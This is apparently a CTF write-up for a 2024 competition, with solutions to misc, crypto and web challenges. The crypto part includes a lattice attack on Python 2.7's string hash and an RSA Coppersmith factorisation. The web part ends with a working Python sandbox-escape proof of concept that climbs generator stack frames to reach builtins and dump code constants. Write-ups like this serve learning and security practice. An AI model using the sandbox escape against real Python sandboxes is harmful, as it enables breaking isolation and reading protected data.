Misc

Power Trajectory Diagram

We are given an npz file. Load it, take the norm of each trace, and sort by norm.

```python
import numpy as np

npz_file = np.load("attachment.npz")
index = npz_file['index']
inputs = npz_file['input']
output = npz_file['output']
trace = npz_file['trace']

# Group (trace norm, candidate input character) pairs by character position.
norms = {}
for i in range(520):
    if norms.get(index[i]) is None:
        norms[index[i]] = []
    norms[index[i]].append((np.linalg.norm(trace[i]), inputs[i]))

# For each position, print the input whose trace has the largest norm.
for key in norms:
    norm = sorted(norms[key], key=lambda x: x[0])[::-1]
    print(norm[0][1], end="")
```

This yields ziscn_2034; completing it and brute-forcing the remaining characters gives the flag. flag{_ciscn_2024}

Ventilator (通风机)

Searching for the mwp file type leads to STEP 7-Micro/WIN.

The file is reported as an incompatible format; restoring the missing GJK at the start of the file header fixes it.

This then yields the flag, encoded with a single layer of base64.

Hotpot Chain Sightseeing Check-in (火锅链观光打卡)

Just answer the questions.

Crypto

hash

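Python 2.7's hash uses the FNV algorithm (https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function). Following https://ctf-wiki.org/crypto/hash/fnv/, replace the XOR with addition and apply lattice basis reduction; the shortest reduced vector is the solution, so the key can be computed and the flag recovered.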

```sage
import binascii
import hashlib

a = 1000003
al = []
for i in range(8):
    al.append(a^i)

# Weights for the 7 unknown small terms; the first byte also enters as byte << 7.
wl = []
for i in range(6):
    wl.append(al[i])
wl.append(2^7*al[7] + al[6])

m = matrix(ZZ,9,9)
x = 7457312583301101235
length = 7
mask = 0xffffffffffffffff
x = x ^^ length & mask   # undo the final XOR with the length
print(x)
wl.append(-x)

# Lattice basis: scaled weights in column 0, identity for the coefficients.
for i in range(8):
    m[i,0] = wl[i]*2**20
    m[i,i+1] = 1
m[-2,-1] = 2^8
m[-1,0] = 2^64*2**20

for v in m.LLL():
    cr = []
    if abs(v[-1]) == 256:
        c = v[1:-1] * sgn(v[-1])
        xx = x
        # Walk the hash state backwards to turn additive terms into XORed bytes.
        for ci in c:
            xx_ = (xx - ci)*inverse_mod(a,2**64)%2**64
            cr.append(xx^^(xx_*a)%2**64)
            xx = xx_
        print(cr)
        s = sum(a**i*c[i] for i in range(7)) + a ** 7 * 2 ** 7 * c[-1]
        s %= 2**64
        assert s == x
        break

msg = 13903983817893117249931704406959869971132956255130487015289848690577655239262013033618370827749581909492660806312017
key = bytes(ci for ci in cr[::-1])
# XOR (^^ in Sage) the message with SHA-384 of the hex-encoded key.
print(bytes.fromhex(hex(msg^^int(hashlib.sha384(binascii.hexlify(key)).hexdigest(), 16))[2:]))
```
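The following is an added example, not code from the original writeup or the challenge: it shows why swapping XOR for addition is valid, because each XOR with a byte changes the state by at most 255, so the hash is a linear form in powers of 1000003 with small coefficients. `KEY` is a constructed sample and the function names are illustrative; hash randomization is assumed off, as is the default in Python 2.7.

```python
# Added illustration: Python 2.7's 64-bit str hash and the
# "XOR as small addition" view that the lattice step relies on.
A = 1000003
MOD = 2**64
A_INV = pow(A, -1, MOD)  # A is odd, so it is invertible mod 2^64

def py27_hash(data: bytes) -> int:
    """Unsigned 64-bit value of CPython 2.7's string hash (no randomization)."""
    if not data:
        return 0
    x = data[0] << 7
    for b in data:
        x = ((A * x) % MOD) ^ b
    return x ^ len(data)

def signed(v: int) -> int:
    v %= MOD
    return v - MOD if v >= MOD // 2 else v

def additive_deltas(data: bytes) -> list:
    """d_k with x_{k+1} = A*x_k + d_k (mod 2^64). XOR with a byte only
    touches the low 8 bits, so every |d_k| <= 255."""
    x, deltas = data[0] << 7, []
    for b in data:
        nxt = ((A * x) % MOD) ^ b
        deltas.append(signed(nxt - A * x))
        x = nxt
    return deltas

def linear_form(deltas, first_byte: int) -> int:
    """Hash state before the length XOR, written as a sum of A^i * d."""
    n = len(deltas)
    total = pow(A, n, MOD) * (first_byte << 7)
    for k, d in enumerate(deltas):
        total += pow(A, n - 1 - k, MOD) * d
    return total % MOD

def recover_bytes(x_final: int, deltas) -> bytes:
    """Run the recurrence backwards to map additive terms back to bytes."""
    out, x = [], x_final
    for d in reversed(deltas):
        prev = ((x - d) * A_INV) % MOD
        out.append(x ^ ((prev * A) % MOD))
        x = prev
    return bytes(reversed(out))

KEY = b"k3y_abc"  # constructed sample, not the challenge key
```

Because the small-coefficient linear form fully determines the input, this hash offers no preimage resistance and should not be used where a cryptographic hash or keyed MAC is required.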

Classical Cipher (古典密码)

Atbash cipher, then base64 decode, then fence (rail fence) cipher.

OvO

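p and q are close to each other, so they can be treated as a single value. Solving the resulting equation gives approximate values of p and q.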

With the approximate value of p, a Coppersmith attack then recovers p and q.

```sage
import sympy

n = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967
e = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104
c = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823

rr = e // n
kk = rr - 2

# Solve the quadratic to get an approximation p_ of p.
x = sympy.symbols('x')
f = (kk+rr) * x ** 2 + (rr * n + rr + 65537 + 1 - e) * x + rr * n
p_ = int(sympy.solve(f)[1])

# Coppersmith: find the small correction x0 such that p_ + x0 divides n.
P.<x> = PolynomialRing(Zmod(n))
f = x + p_
x0 = f.small_roots(X=2^75,beta=0.4)[0]
p = int(p_ + x0)
assert n % p == 0
q = n // int(p)

# Recompute e from the recovered p and q, then decrypt.
phi = (p-1)*(q-1)
e = 65537 + kk * p + rr * ((p+1) * (q+1)) + 1
d = pow(e,-1,phi)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))
```

Web

mossfern

Reading the source code shows this is a sandbox escape. Experimenting shows it is a stack-frame sandbox escape.

https://xz.aliyun.com/t/13635

Following the article above, a PoC can be constructed:

```python
def waff():
    def f():
        yield generator.gi_frame.f_back
    generator = f()
    frame = [x for x in generator][0]
    str = frame.f_back.f_back.f_back.f_globals['_'*2+"builtins"+'_'*2].str
    for i in str(frame.f_back.f_back.f_back.f_code.co_consts):
        print(i)
waff()
```